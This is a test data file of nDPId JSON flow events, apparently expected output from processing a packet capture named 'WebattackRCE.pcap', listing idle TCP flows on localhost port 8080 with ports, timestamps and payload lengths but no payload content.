+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7560000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7560000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7560000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7560000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7560000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7560000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7560000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7560000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7560000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 